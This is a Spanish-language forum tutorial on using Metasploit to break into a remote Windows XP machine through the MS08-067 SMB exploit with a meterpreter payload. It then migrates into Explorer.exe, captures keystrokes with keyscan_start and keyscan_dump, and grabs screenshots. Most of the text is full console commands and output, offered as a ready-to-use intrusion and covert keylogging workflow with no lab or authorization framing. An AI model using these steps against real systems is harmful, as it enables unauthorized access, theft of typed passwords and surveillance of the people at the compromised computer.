Usar Keylogger del Metasploit
[Metasploit By: Shell Root]
[Metasploit By: Shell Root]
Una de las muchas herramientas que trae integrada el Metasploit, es un Keylogger. Podemos capturar las teclas presionadas en el P.C Remoto, ademas de poder sacar un Screenshot. Aquí veremos el uso de esté servicio del Metasploit.
Primero ingresaremos a la P.C con el exploit:
* exploit/windows/smb/ms08_067_netapi
y con el PAYLOAD:
* windows/shell/bind_tcp
* windows/shell/reverse_tcp
En este caso usaremos el PAYLOAD windows/shell/bind_tcp. No explicaré mucho porque para eso esta este POST de mi amigo Rcart.
http://foro.portalhacker.net/index.php/topic,93233.0.html
Código:
__. .__. .__. __.
_____ _____/ |______ ____________ | | ____ |__|/ |_
/ \_/ __ \ __\__ \ / ___/\____ \| | / _ \| \ __\
| Y Y \ ___/| | / __ \_\___ \ | |_> > |_( <_> ) || |
|__|_| /\___ >__| (____ /____ >| __/|____/\____/|__||__|
\/ \/ \/ \/ |__|
=[ metasploit v3.3.2-release [core:3.3 api:1.0]
+ -- --=[ 462 exploits - 219 auxiliary
+ -- --=[ 192 payloads - 22 encoders - 8 nops
=[ svn r7808 updated 8 days ago (2009.12.10)
Warning: This copy of the Metasploit Framework was last updated 8 days ago.
We recommend that you update the framework at least every other day.
For information on updating your copy of Metasploit, please see:
http://dev.metasploit.com/redmine/projects/framework/wiki/Updating
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set RHOST 192.168.0.3
RHOST => 192.168.0.3
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
PAYLOAD => windows/meterpreter/bind_tcp
msf exploit(ms08_067_netapi) > exploit
[*] Started bind handler
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP Service Pack 2 - lang:Spanish
[*] Selected Target: Windows XP SP2 Spanish (NX)
[*] Triggering the vulnerability...
[*] Sending stage (723456 bytes)
[*] Meterpreter session 1 opened (192.168.0.2:4367 -> 192.168.0.3:4444)
meterpreter >
Ahora que estamos dentro del P.C remoto, miremos las optiones que tiene, con el comando Help
Código:
meterpreter > help
Core Commands
=============
Command Description
------- -----------
ps List running processes
migrate Migrate the server to another process
use Load a one or more meterpreter extensions
Stdapi: User interface Commands
===============================
Command Description
------- -----------
keyscan_dump Dump they keystroke buffer
keyscan_start Start capturing keystrokes
keyscan_stop Stop capturing keystrokes
meterpreter >
Es la hora de iniciar nuestro keylogger, pero antes, mirelos los procesos que estan corriendo en la P.C Remota, con el comando ps
Código:
meterpreter > ps
Process list
============
PID Name Path
--- ---- ----
368 smss.exe \SystemRoot\System32\smss.exe
548 csrss.exe \??\C:\WINDOWS\system32\csrss.exe
576 winlogon.exe \??\C:\WINDOWS\system32\winlogon.exe
656 services.exe C:\WINDOWS\system32\services.exe
668 lsass.exe C:\WINDOWS\system32\lsass.exe
824 svchost.exe C:\WINDOWS\system32\svchost.exe
840 cmd.exe C:\WINDOWS\system32\cmd.exe
892 svchost.exe C:\WINDOWS\system32\svchost.exe
988 svchost.exe C:\WINDOWS\System32\svchost.exe
1040 svchost.exe C:\WINDOWS\system32\svchost.exe
1128 svchost.exe C:\WINDOWS\system32\svchost.exe
1384 wuauclt.exe C:\WINDOWS\system32\wuauclt.exe
1452 Explorer.EXE C:\WINDOWS\Explorer.EXE
1512 spoolsv.exe C:\WINDOWS\system32\spoolsv.exe
1684 alg.exe C:\WINDOWS\System32\alg.exe
1700 wscntfy.exe C:\WINDOWS\system32\wscntfy.exe
1800 ctfmon.exe C:\WINDOWS\system32\ctfmon.exe
1908 inetinfo.exe C:\WINDOWS\system32\inetsrv\inetinfo.exe
1936 metsvc.exe C:\WINDOWS\TEMP\LsMhsBTb\metsvc.exe
meterpreter >
Ahora migremos al proceso Explorer.exe. Usaremos el comando Migrate [Numero_Proceso] . Miremos el PID del proceso Explorer.exe, es el numero 1452.
Código:
meterpreter > migrate 1452
[*] Migrating to 1452...
[*] Migration completed successfully.
meterpreter >
Ya es hora de que iniciaremos el Keylogger con el comando keyscan_start
Código:
meterpreter > keyscan_start
Starting the keystroke sniffer...
meterpreter >
Ahora con ayuda del comando keyscan_dump , veremos las teclas presionadas en la P.C Remota.
Código:
meterpreter > keyscan_dump
Dumping captured keystrokes...
net user <Return> <Ctrl> <LCtrl> <Alt> <LMenu>
meterpreter >
Ahora miremos la opción de sacar un ScreenShot de la P.C Remota, para ello usaremos el plugin espia del metasploit.
Código:
meterpreter > use espia
Loading extension espia...success.
meterpreter >
Despues con el comando screenshot [Ruta_Archivo_Salida] sacaremos una captura de pantalla de la P.C Remota.
Código:
meterpreter > screenshot /Prueba.bmp
[*] Image saved to /Prueba.bmp
meterpreter >
Con esto damos por concluida el uso del Keylogger y lo pausamos con el comando keyscan_stop
Código:
meterpreter > keyscan_stop
Stopping the keystroke sniffer...
meterpreter >
By: Shell Root
Fuente: http://shellrootsecurity.blogspot.com/2009/12/usar-keylogger-del-metasploit.html
Video: http://www.youtube.com/watch?v=f8_M6V3xILE